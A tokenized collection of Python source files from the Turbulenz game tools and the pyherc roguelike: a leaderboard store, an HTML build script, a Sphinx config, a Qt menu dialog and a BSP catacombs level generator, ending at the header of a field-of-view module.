path ) <EOL> if path_exists ( unicode_path ) : <EOL> try : <EOL> try : <EOL> f = open ( unicode_path , '<STR_LIT:r>' ) <EOL> file_leaderboard = yaml . load ( f ) <EOL> if file_leaderboard : <EOL> for s in file_leaderboard : <EOL> self . _add_score ( UserScore ( s [ '<STR_LIT:user>' ] , s [ '<STR_LIT>' ] , s [ '<STR_LIT:time>' ] ) ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( IOError , KeyError , yaml . YAMLError ) as e : <EOL> LOG . error ( '<STR_LIT>' , self . path , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % ( self . path , str ( e ) ) ) <EOL> else : <EOL> self . user_scores = { } <EOL> self . scores = [ ] <EOL> for s in self . default_scores : <EOL> username = s . user <EOL> if username not in self . user_scores : <EOL> self . _add_score ( s . copy ( ) ) <EOL> self . _sort_scores ( ) <EOL> def _write_leaderboard ( self ) : <EOL> self . _sort_scores ( ) <EOL> try : <EOL> self . _set_path ( ) <EOL> with self . lock : <EOL> try : <EOL> f = open ( unicode ( self . path ) , '<STR_LIT:w>' ) <EOL> yaml . dump ( [ s . to_dict ( ) for s in self . scores ] , f , default_flow_style = False ) <EOL> finally : <EOL> f . close ( ) <EOL> except IOError as e : <EOL> LOG . error ( '<STR_LIT>' , self . path , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % self . path ) <EOL> def _empty_leaderboard ( self ) : <EOL> self . scores = [ ] <EOL> self . user_scores = { } <EOL> self . aggregate_score = <NUM_LIT:0> <EOL> self . _set_path ( ) <EOL> unicode_path = unicode ( self . path ) <EOL> if not path_exists ( unicode_path ) : <EOL> return <EOL> with self . lock : <EOL> try : <EOL> f = open ( unicode_path , '<STR_LIT:w>' ) <EOL> f . close ( ) <EOL> except IOError as e : <EOL> LOG . error ( '<STR_LIT>' , self . path , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % self . path ) <EOL> def _sort_scores ( self ) : <EOL> self . scores . sort ( key = lambda s : ( - self . sort_by * s . score , s . 
score_time ) ) <EOL> def _rank_leaderboard ( self , leaderboard , top_rank ) : <EOL> length = len ( leaderboard ) <EOL> if length == <NUM_LIT:0> : <EOL> return <EOL> leaderboard . sort ( key = lambda r : ( - self . sort_by * r [ '<STR_LIT>' ] , r [ '<STR_LIT:time>' ] ) ) <EOL> num_top = top_rank [ <NUM_LIT:1> ] <EOL> prev_rank = top_rank [ <NUM_LIT:0> ] <EOL> rank = prev_rank + num_top <EOL> top_score = leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> prev_score = top_score <EOL> for i in xrange ( length ) : <EOL> r = leaderboard [ i ] <EOL> score = r [ '<STR_LIT>' ] <EOL> if score != prev_score : <EOL> prev_score = score <EOL> prev_rank = rank <EOL> r [ '<STR_LIT>' ] = prev_rank <EOL> if score != top_score : <EOL> rank += <NUM_LIT:1> <EOL> @ classmethod <EOL> def _get_row ( cls , username , score ) : <EOL> user = get_user ( username ) <EOL> return { '<STR_LIT:user>' : <EOL> { <EOL> '<STR_LIT:username>' : username , <EOL> '<STR_LIT>' : username , <EOL> '<STR_LIT>' : user . avatar <EOL> } , <EOL> '<STR_LIT>' : score . score , <EOL> '<STR_LIT:time>' : score . score_time } <EOL> def _get_user_row ( self , user ) : <EOL> username = user . username <EOL> if username in self . user_scores : <EOL> return self . _get_row ( username , self . user_scores [ username ] ) <EOL> else : <EOL> return None <EOL> def _get_rank ( self , score ) : <EOL> top_rank = <NUM_LIT:1> <EOL> count = <NUM_LIT:0> <EOL> for s in self . scores : <EOL> if score == s . 
score : <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> if count != <NUM_LIT:0> : <EOL> return ( top_rank , count ) <EOL> top_rank += <NUM_LIT:1> <EOL> return ( top_rank , count ) <EOL> @ classmethod <EOL> def create_response ( cls , top , bottom , ranking , player = None ) : <EOL> response = { <EOL> '<STR_LIT>' : top , <EOL> '<STR_LIT>' : bottom , <EOL> '<STR_LIT>' : ranking <EOL> } <EOL> if player is not None : <EOL> response [ '<STR_LIT>' ] = player <EOL> return response <EOL> def get_top_players ( self , user , num_top_players ) : <EOL> self . _read_leaderboard ( ) <EOL> scores = self . scores <EOL> leaderboard = [ ] <EOL> player = None <EOL> try : <EOL> for i in xrange ( num_top_players ) : <EOL> s = scores [ i ] <EOL> username = s . user <EOL> row = self . _get_row ( username , s ) <EOL> if username == user . username : <EOL> player = row <EOL> leaderboard . append ( row ) <EOL> except IndexError : <EOL> pass <EOL> if player is None : <EOL> player = self . _get_user_row ( user ) <EOL> if len ( leaderboard ) > <NUM_LIT:0> : <EOL> self . _rank_leaderboard ( leaderboard , self . _get_rank ( leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> bottom = len ( scores ) <= num_top_players <EOL> return self . create_response ( True , bottom , leaderboard , player ) <EOL> def get_page ( self , user , max_page_size , is_above , score , score_time ) : <EOL> self . _read_leaderboard ( ) <EOL> scores = self . scores <EOL> leaderboard = [ ] <EOL> player = None <EOL> query_complete = False <EOL> if not is_above : <EOL> scores = reversed ( scores ) <EOL> for s in scores : <EOL> if is_above : <EOL> if self . sort_by * s . score < self . sort_by * score or ( s . score == score and s . score_time >= score_time ) : <EOL> query_complete = True <EOL> else : <EOL> if self . sort_by * s . score > self . sort_by * score or ( s . score == score and s . 
score_time <= score_time ) : <EOL> query_complete = True <EOL> if query_complete and len ( leaderboard ) >= max_page_size : <EOL> break <EOL> username = s . user <EOL> row = self . _get_row ( username , s ) <EOL> if username == user . username : <EOL> player = row <EOL> leaderboard . append ( row ) <EOL> leaderboard = leaderboard [ - max_page_size : ] <EOL> if not is_above : <EOL> leaderboard = list ( reversed ( leaderboard ) ) <EOL> if player is None : <EOL> player = self . _get_user_row ( user ) <EOL> if len ( leaderboard ) > <NUM_LIT:0> : <EOL> self . _rank_leaderboard ( leaderboard , self . _get_rank ( leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> top = ( self . scores [ <NUM_LIT:0> ] . user == leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT:user>' ] [ '<STR_LIT:username>' ] ) <EOL> bottom = ( self . scores [ - <NUM_LIT:1> ] . user == leaderboard [ - <NUM_LIT:1> ] [ '<STR_LIT:user>' ] [ '<STR_LIT:username>' ] ) <EOL> else : <EOL> top = True <EOL> bottom = True <EOL> return self . create_response ( top , bottom , leaderboard , player ) <EOL> def get_near ( self , user , size ) : <EOL> self . _read_leaderboard ( ) <EOL> scores = self . scores <EOL> if len ( scores ) == <NUM_LIT:0> : <EOL> return self . create_response ( True , True , [ ] ) <EOL> if not user . username in self . user_scores : <EOL> return self . get_top_players ( user , size ) <EOL> index = None <EOL> for i , r in enumerate ( scores ) : <EOL> if r . user == user . 
username : <EOL> index = i <EOL> break <EOL> start = index - int ( floor ( size * <NUM_LIT:0.5> ) ) <EOL> end = index + int ( ceil ( size * <NUM_LIT:0.5> ) ) <EOL> num_scores = len ( scores ) <EOL> if start < <NUM_LIT:0> : <EOL> end -= start <EOL> start = <NUM_LIT:0> <EOL> if end > num_scores : <EOL> end = num_scores <EOL> elif end > num_scores : <EOL> start -= ( end - num_scores ) <EOL> end = num_scores <EOL> if start < <NUM_LIT:0> : <EOL> start = <NUM_LIT:0> <EOL> leaderboard = [ ] <EOL> player = None <EOL> for i in xrange ( start , end , <NUM_LIT:1> ) : <EOL> s = scores [ i ] <EOL> username = s . user <EOL> row = self . _get_row ( username , s ) <EOL> if username == user . username : <EOL> player = row <EOL> leaderboard . append ( row ) <EOL> if player is None : <EOL> player = self . _get_user_row ( user ) <EOL> self . _rank_leaderboard ( leaderboard , self . _get_rank ( leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> top = ( start == <NUM_LIT:0> ) <EOL> bottom = ( end == num_scores ) <EOL> return self . create_response ( top , bottom , leaderboard , player ) <EOL> def read_overview ( self , user ) : <EOL> self . _read_leaderboard ( ) <EOL> try : <EOL> users_score = self . user_scores [ user . username ] <EOL> score = users_score . score <EOL> rank = self . _get_rank ( score ) [ <NUM_LIT:0> ] <EOL> return { '<STR_LIT:key>' : self . key , <EOL> '<STR_LIT>' : score , <EOL> '<STR_LIT>' : rank , <EOL> '<STR_LIT:time>' : users_score . score_time } <EOL> except KeyError : <EOL> return None <EOL> def read_aggregates ( self ) : <EOL> self . _read_leaderboard ( ) <EOL> if self . aggregate : <EOL> return { <EOL> '<STR_LIT:key>' : self . key , <EOL> '<STR_LIT>' : self . aggregate_score , <EOL> '<STR_LIT>' : len ( self . scores ) <EOL> } <EOL> return None <EOL> def set ( self , user , new_score ) : <EOL> score_time = time_now ( ) <EOL> self . _read_leaderboard ( ) <EOL> try : <EOL> users_score = self . user_scores [ user . username ] <EOL> old_score = users_score . 
score <EOL> if ( self . sort_by == <NUM_LIT:1> and old_score >= new_score ) or ( self . sort_by == - <NUM_LIT:1> and old_score <= new_score ) : <EOL> return { '<STR_LIT>' : old_score } <EOL> users_score . score = new_score <EOL> users_score . score_time = score_time <EOL> if self . aggregate : <EOL> self . aggregate_score += new_score - old_score <EOL> self . _write_leaderboard ( ) <EOL> return { '<STR_LIT>' : True , '<STR_LIT>' : old_score } <EOL> except KeyError : <EOL> self . _add_score ( UserScore ( user . username , new_score , score_time ) ) <EOL> self . _write_leaderboard ( ) <EOL> return { '<STR_LIT>' : True } <EOL> def remove ( self ) : <EOL> self . _empty_leaderboard ( ) <EOL> class GameLeaderboards ( object ) : <EOL> def __init__ ( self , game ) : <EOL> self . leaderboards = { } <EOL> self . ordered_leaderboards = [ ] <EOL> self . leaderboard_path = None <EOL> self . issues = [ ] <EOL> yaml_path = unicode ( get_absolute_path ( join_path ( game . path , '<STR_LIT>' ) ) ) <EOL> total_yaml_errors = <NUM_LIT:0> <EOL> if path_exists ( yaml_path ) : <EOL> try : <EOL> f = open ( yaml_path , '<STR_LIT:r>' ) <EOL> try : <EOL> file_meta = yaml . load ( f ) <EOL> for ( i , m ) in enumerate ( file_meta ) : <EOL> key = m [ '<STR_LIT:key>' ] <EOL> leaderboard = Leaderboard ( game , key , m , i ) <EOL> num_errors = len ( leaderboard . errors ) <EOL> if num_errors > <NUM_LIT:0> : <EOL> total_yaml_errors += num_errors <EOL> self . issues . append ( ( key , { <EOL> '<STR_LIT>' : leaderboard . errors , <EOL> '<STR_LIT>' : leaderboard . warnings <EOL> } ) ) <EOL> elif len ( leaderboard . warnings ) > <NUM_LIT:0> : <EOL> self . issues . append ( ( key , { <EOL> '<STR_LIT>' : leaderboard . errors , <EOL> '<STR_LIT>' : leaderboard . warnings <EOL> } ) ) <EOL> self . leaderboards [ key ] = leaderboard <EOL> self . ordered_leaderboards . append ( leaderboard ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( IOError , yaml . YAMLError ) as e : <EOL> LOG . 
error ( '<STR_LIT>' , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % str ( e ) ) <EOL> else : <EOL> raise LeaderboardsUnsupported ( ) <EOL> if total_yaml_errors > <NUM_LIT:0> : <EOL> raise ValidationException ( self . issues ) <EOL> def _get_leaderboard ( self , key ) : <EOL> try : <EOL> return self . leaderboards [ key ] <EOL> except KeyError : <EOL> raise LeaderboardError ( '<STR_LIT>' % key , <NUM_LIT> ) <EOL> def read_meta ( self ) : <EOL> return [ l . to_dict ( ) for l in self . ordered_leaderboards ] <EOL> def read_overview ( self , user ) : <EOL> result = [ ] <EOL> for l in self . ordered_leaderboards : <EOL> overview = l . read_overview ( user ) <EOL> if overview : <EOL> result . append ( overview ) <EOL> return result <EOL> def read_aggregates ( self ) : <EOL> return [ l . read_aggregates ( ) for l in self . ordered_leaderboards if l . aggregate ] <EOL> def get_top_players ( self , key , user , num_top_players ) : <EOL> return self . _get_leaderboard ( key ) . get_top_players ( user , num_top_players ) <EOL> def get_page ( self , key , user , num_top_players , is_above , score , score_time ) : <EOL> return self . _get_leaderboard ( key ) . get_page ( user , num_top_players , is_above , score , score_time ) <EOL> def get_near ( self , key , user , num_near ) : <EOL> return self . _get_leaderboard ( key ) . get_near ( user , num_near ) <EOL> def set ( self , key , user , score ) : <EOL> return self . _get_leaderboard ( key ) . set ( user , score ) <EOL> def remove_all ( self ) : <EOL> for key in self . leaderboards : <EOL> self . leaderboards [ key ] . remove ( ) <EOL> class LeaderboardsList ( object ) : <EOL> game_leaderboards = { } <EOL> @ classmethod <EOL> def load ( cls , game ) : <EOL> game_leaderboard = GameLeaderboards ( game ) <EOL> cls . game_leaderboards [ game . slug ] = game_leaderboard <EOL> return game_leaderboard <EOL> @ classmethod <EOL> def get ( cls , game ) : <EOL> try : <EOL> return cls . game_leaderboards [ game . 
slug ] <EOL> except KeyError : <EOL> return cls . load ( game ) <EOL> @ classmethod <EOL> def reset ( cls ) : <EOL> cls . game_leaderboards = { } </s>
<s> from logging import getLogger <EOL> from os . path import splitext , basename <EOL> from optparse import OptionParser , TitledHelpFormatter <EOL> from turbulenz_tools . utils . dependencies import find_dependencies <EOL> from turbulenz_tools . utils . dependencies import find_file_in_dirs <EOL> from turbulenz_tools . utils . profiler import Profiler <EOL> from turbulenz_tools . tools . templates import env_create <EOL> from turbulenz_tools . tools . templates import env_load_template <EOL> from turbulenz_tools . tools . templates import env_load_templates <EOL> from turbulenz_tools . tools . appcodegen import render_js <EOL> from turbulenz_tools . tools . appcodegen import context_from_options <EOL> from turbulenz_tools . tools . appcodegen import default_add_code <EOL> from turbulenz_tools . tools . appcodegen import inject_js_from_options <EOL> from turbulenz_tools . tools . appcodegen import default_parser_options <EOL> from turbulenz_tools . tools . appcodegen import DEFAULT_HTML_TEMPLATE <EOL> from turbulenz_tools . tools . appcodegen import output_dependency_info <EOL> from turbulenz_tools . tools . toolsexception import ToolsException <EOL> from turbulenz_tools . tools . stdtool import simple_options <EOL> __version__ = '<STR_LIT>' <EOL> __dependencies__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> LOG = getLogger ( __name__ ) <EOL> def _parser ( ) : <EOL> parser = OptionParser ( description = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> usage = "<STR_LIT>" , <EOL> formatter = TitledHelpFormatter ( ) ) <EOL> default_parser_options ( parser ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . 
add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> dest = "<STR_LIT>" , default = False , <EOL> help = "<STR_LIT>" ) <EOL> return parser <EOL> def check_input ( input_files ) : <EOL> """<STR_LIT>""" <EOL> js_files = [ ] <EOL> html_files = [ ] <EOL> for f in input_files : <EOL> ext = splitext ( f ) [ <NUM_LIT:1> ] <EOL> if ext in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> js_files . append ( f ) <EOL> elif ext in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> html_files . append ( f ) <EOL> else : <EOL> LOG . error ( "<STR_LIT>" , f ) <EOL> exit ( <NUM_LIT:1> ) <EOL> return ( js_files , html_files ) <EOL> def load_html_template ( env , input_html ) : <EOL> if <NUM_LIT:1> == len ( input_html ) : <EOL> return env_load_template ( env , input_html [ <NUM_LIT:0> ] ) <EOL> return env . from_string ( DEFAULT_HTML_TEMPLATE ) <EOL> def dump_default_template ( outfile_name ) : <EOL> if outfile_name is None : <EOL> outfile_name = '<STR_LIT>' <EOL> with open ( outfile_name , "<STR_LIT:wb>" ) as f : <EOL> f . write ( DEFAULT_HTML_TEMPLATE ) <EOL> LOG . info ( "<STR_LIT>" , outfile_name ) <EOL> return <NUM_LIT:0> <EOL> def html_dump_dependencies ( env , options , input_js , input_html ) : <EOL> """<STR_LIT>""" <EOL> outfile_name = options . dependency_file <EOL> if outfile_name is None : <EOL> LOG . error ( "<STR_LIT>" ) <EOL> return <NUM_LIT:1> <EOL> if <NUM_LIT:1> == len ( input_html ) : <EOL> try : <EOL> deps = find_dependencies ( input_html [ <NUM_LIT:0> ] , options . templatedirs , env , <EOL> [ '<STR_LIT:default>' ] ) <EOL> except Exception , e : <EOL> raise ToolsException ( "<STR_LIT>" % str ( e ) ) <EOL> else : <EOL> deps = [ ] <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> deps += [ find_file_in_dirs ( js , options . templatedirs ) for js in input_js ] <EOL> output_dependency_info ( outfile_name , options . 
output , deps ) <EOL> return <NUM_LIT:0> <EOL> def html_generate ( env , options , input_js , input_html ) : <EOL> """<STR_LIT>""" <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> template_html = load_html_template ( env , input_html ) <EOL> if template_html is None : <EOL> LOG . error ( "<STR_LIT>" , input_html [ <NUM_LIT:0> ] ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if len ( input_js ) > <NUM_LIT:0> : <EOL> title = input_js [ <NUM_LIT:0> ] <EOL> elif options . codefile : <EOL> title = options . codefile <EOL> elif len ( input_html ) > <NUM_LIT:0> : <EOL> title = input_html [ <NUM_LIT:0> ] <EOL> else : <EOL> title = "<STR_LIT>" <EOL> title = splitext ( basename ( title ) ) [ <NUM_LIT:0> ] <EOL> context = context_from_options ( options , title ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> rendered_js = "<STR_LIT>" <EOL> inc_js = [ ] <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> inject_js = inject_js_from_options ( options ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> templates_js = env_load_templates ( env , input_js ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> ( rendered_js , inc_js ) = render_js ( context , options , templates_js , <EOL> inject_js ) <EOL> default_add_code ( options , context , rendered_js , inc_js ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> try : <EOL> res = template_html . render ( context ) <EOL> except Exception , e : <EOL> raise ToolsException ( "<STR_LIT>" % ( input_html , e . __class__ . __name__ , str ( e ) ) ) <EOL> try : <EOL> with open ( options . output , "<STR_LIT:wb>" ) as f : <EOL> f . write ( res . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except IOError : <EOL> raise ToolsException ( "<STR_LIT>" % options . output ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> return <NUM_LIT:0> <EOL> def main ( ) : <EOL> ( options , args , parser ) = simple_options ( _parser , __version__ , <EOL> __dependencies__ , input_required = False ) <EOL> Profiler . 
start ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> input_files = args <EOL> if options . dump_default_template : <EOL> exit ( dump_default_template ( options . output ) ) <EOL> elif <NUM_LIT:0> == len ( args ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> parser . print_help ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> LOG . info ( "<STR_LIT>" , options ) <EOL> LOG . info ( "<STR_LIT>" , args ) <EOL> LOG . info ( "<STR_LIT>" , parser ) <EOL> LOG . info ( "<STR_LIT>" , options . templatedirs ) <EOL> if options . output is None : <EOL> LOG . error ( "<STR_LIT>" ) <EOL> parser . print_help ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if options . mode not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> LOG . error ( '<STR_LIT>' , options . mode ) <EOL> parser . print_help ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] and not options . dependency and not options . codefile : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> parser . print_usage ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> ( input_js , input_html ) = check_input ( input_files ) <EOL> LOG . info ( "<STR_LIT>" , input_js ) <EOL> LOG . info ( "<STR_LIT>" , input_html ) <EOL> if <NUM_LIT:0> == len ( input_js ) : <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> parser . print_usage ( ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if <NUM_LIT:1> < len ( input_html ) : <EOL> LOG . error ( '<STR_LIT>' , input_html ) <EOL> exit ( <NUM_LIT:1> ) <EOL> env = env_create ( options , DEFAULT_HTML_TEMPLATE ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> retval = <NUM_LIT:1> <EOL> try : <EOL> if options . dependency : <EOL> LOG . info ( "<STR_LIT>" ) <EOL> retval = html_dump_dependencies ( env , options , input_js , input_html ) <EOL> LOG . info ( "<STR_LIT>" ) <EOL> else : <EOL> retval = html_generate ( env , options , input_js , input_html ) <EOL> except ToolsException , e : <EOL> LOG . 
error ( "<STR_LIT:%s>" , str ( e ) ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . dump_data ( ) <EOL> return retval <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> exit ( main ( ) ) </s>
<s> import sys , os , hy <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> from pyherc . version import PYHERC_VERSION <EOL> extensions = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = PYHERC_VERSION <EOL> release = PYHERC_VERSION <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from herculeum . ui . gui . character import CharacterWidget <EOL> from herculeum . ui . gui . inventory import InventoryWidget <EOL> from PyQt4 . QtGui import QDialog , QTabWidget , QVBoxLayout <EOL> class MenuDialog ( QDialog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , surface_manager , character , action_factory , config , <EOL> parent , flags ) : <EOL> """<STR_LIT>""" <EOL> super ( MenuDialog , self ) . __init__ ( parent , flags ) <EOL> self . __set_layout ( surface_manager , <EOL> character , <EOL> action_factory , <EOL> config , <EOL> parent ) <EOL> def __set_layout ( self , surface_manager , character , action_factory , <EOL> config , parent ) : <EOL> """<STR_LIT>""" <EOL> self . keymap = self . _construct_keymap ( config ) <EOL> self . setWindowTitle ( '<STR_LIT>' ) <EOL> self . inventory = InventoryWidget ( surface_manager = surface_manager , <EOL> character = character , <EOL> action_factory = action_factory , <EOL> config = config , <EOL> parent = parent ) <EOL> self . character = CharacterWidget ( surface_manager = surface_manager , <EOL> character = character , <EOL> parent = parent ) <EOL> self . tabs = QTabWidget ( ) <EOL> self . tabs . addTab ( self . inventory , '<STR_LIT>' ) <EOL> self . tabs . addTab ( self . character , '<STR_LIT>' ) <EOL> layout = QVBoxLayout ( ) <EOL> layout . addWidget ( self . tabs ) <EOL> self . setLayout ( layout ) <EOL> self . inventory . items_carried . items [ <NUM_LIT:0> ] . setFocus ( ) <EOL> def _construct_keymap ( self , config ) : <EOL> """<STR_LIT>""" <EOL> keymap = { } <EOL> for key in config . left_shoulder : <EOL> keymap [ key ] = self . _switch_left <EOL> for key in config . right_shoulder : <EOL> keymap [ key ] = self . _switch_right <EOL> for key in config . start : <EOL> keymap [ key ] = self . _menu <EOL> return keymap <EOL> def _switch_left ( self ) : <EOL> """<STR_LIT>""" <EOL> current_tab = self . tabs . 
currentIndex ( ) <EOL> if current_tab > <NUM_LIT:0> : <EOL> self . tabs . setCurrentIndex ( current_tab - <NUM_LIT:1> ) <EOL> def _switch_right ( self ) : <EOL> """<STR_LIT>""" <EOL> current_tab = self . tabs . currentIndex ( ) <EOL> if current_tab < self . tabs . count ( ) : <EOL> self . tabs . setCurrentIndex ( current_tab + <NUM_LIT:1> ) <EOL> def _menu ( self ) : <EOL> """<STR_LIT>""" <EOL> self . done ( <NUM_LIT:0> ) <EOL> def keyPressEvent ( self , event ) : <EOL> """<STR_LIT>""" <EOL> key = event . key ( ) <EOL> if key in self . keymap : <EOL> self . keymap [ key ] ( ) <EOL> else : <EOL> super ( MenuDialog , self ) . keyPressEvent ( event ) </s>
<s> """<STR_LIT>""" <EOL> from . damage import DamageEffect <EOL> from . damagemodifier import DamageModifier <EOL> from . effectscollection import EffectsCollection <EOL> from . effect import Effect , EffectHandle <EOL> from . heal import Heal <EOL> from . movementmode import MovementModeModifier <EOL> from . poison import Poison </s>
"""Catacombs-style level generator based on binary space partitioning."""
from pyherc.aspects import log_debug
from pyherc.generators.utils import BSPSection
from pyherc.generators.level.partitioners import (section_width, section_height,
                                                  section_floor, section_wall)


class CatacombsGenerator():
    """Room generator that carves a catacomb layout into a level section."""

    @log_debug
    def __init__(self, floor_tile, empty_tile, level_types, rng):
        """Initialise the generator.

        :param floor_tile: tile used when carving room/corridor floor
        :param empty_tile: tile used when clearing walls
        :param level_types: level types this generator applies to
        :param rng: random number generator
        """
        self.floor_tile = floor_tile
        self.empty_tile = empty_tile
        # not used by this generator; presumably kept for interface
        # compatibility with sibling generators — TODO confirm
        self.room_width = None
        self.room_height = None
        self.level_types = level_types
        self.rng = rng

    def __call__(self, section):
        """Make the generator callable; delegates to :meth:`generate_room`."""
        self.generate_room(section)

    @log_debug
    def generate_room(self, section):
        """Carve rooms and connecting corridors into ``section``.

        The section is split recursively with a BSP tree. Every leaf node
        receives a randomly shrunken room, then sibling areas are joined
        pairwise with straight corridors between their centres.
        """
        level_size = (section_width(section), section_height(section))
        room_min_size = (3, 3)
        BSPStack = []
        # leave room for the section's outer border (hence the -2)
        BSP = BSPSection((0, 0),
                         (level_size[0] - 2,
                          level_size[1] - 2),
                         None)
        BSPStack.append(BSP)
        room_stack = []
        # split nodes until no further split is possible; leaves become rooms
        while len(BSPStack) > 0:
            tempBSP = BSPStack.pop()
            # min_size includes a margin of 4 around the minimum room size
            tempBSP.split(min_size=(room_min_size[0] + 4,
                                    room_min_size[1] + 4))
            if tempBSP.node1 is not None:
                BSPStack.append(tempBSP.node1)
            if tempBSP.node2 is not None:
                BSPStack.append(tempBSP.node2)
            if tempBSP.node1 is None and tempBSP.node2 is None:
                # leaf node: this area will hold a room
                room_stack.append(tempBSP)
        for room in room_stack:
            # shrink each room by a random 1-4 tile margin inside its leaf
            corner1 = (room.corner1[0] + self.rng.randint(1, 4),
                       room.corner1[1] + self.rng.randint(1, 4))
            corner2 = (room.corner2[0] - self.rng.randint(1, 4),
                       room.corner2[1] - self.rng.randint(1, 4))
            for y in range(corner1[1], corner2[1] + 1):
                for x in range(corner1[0], corner2[0] + 1):
                    section_floor(section,
                                  (x, y),
                                  self.floor_tile,
                                  '<STR_LIT>')
                    section_wall(section,
                                 (x, y),
                                 self.empty_tile,
                                 None)
        # connect sibling areas pairwise with straight corridors
        area_queue = BSP.get_area_queue()
        area_queue.reverse()
        while len(area_queue) > 1:
            area1 = area_queue.pop()
            area2 = area_queue.pop()
            center1 = area1.get_center()
            center2 = area2.get_center()
            if area1.direction == 1:
                # direction flag from BSPSection — presumably a split along
                # one axis, so dig along the y axis here; TODO confirm
                if center1[1] < center2[1]:
                    for y in range(center1[1], center2[1] + 1):
                        section_floor(section,
                                      (center1[0], y),
                                      self.floor_tile,
                                      '<STR_LIT>')
                        section_wall(section,
                                     (center1[0], y),
                                     self.empty_tile,
                                     None)
                else:
                    for y in range(center2[1], center1[1] + 1):
                        section_floor(section,
                                      (center1[0], y),
                                      self.floor_tile,
                                      '<STR_LIT>')
                        section_wall(section,
                                     (center1[0], y),
                                     self.empty_tile,
                                     None)
            else:
                # other split direction: dig along the x axis
                if center1[0] < center2[0]:
                    for x in range(center1[0], center2[0] + 1):
                        section_floor(section,
                                      (x, center1[1]),
                                      self.floor_tile,
                                      '<STR_LIT>')
                        section_wall(section,
                                     (x, center1[1]),
                                     self.empty_tile,
                                     None)
                else:
                    for x in range(center2[0], center1[0] + 1):
                        section_floor(section,
                                      (x, center1[1]),
                                      self.floor_tile,
                                      '<STR_LIT>')
                        section_wall(section,
                                     (x, center1[1]),
                                     self.empty_tile,
                                     None)
"""Field of view computation using recursive shadowcasting."""
from pyherc.data import level_size, blocks_los

# coordinate multipliers that map the canonical scan onto the 8 octants
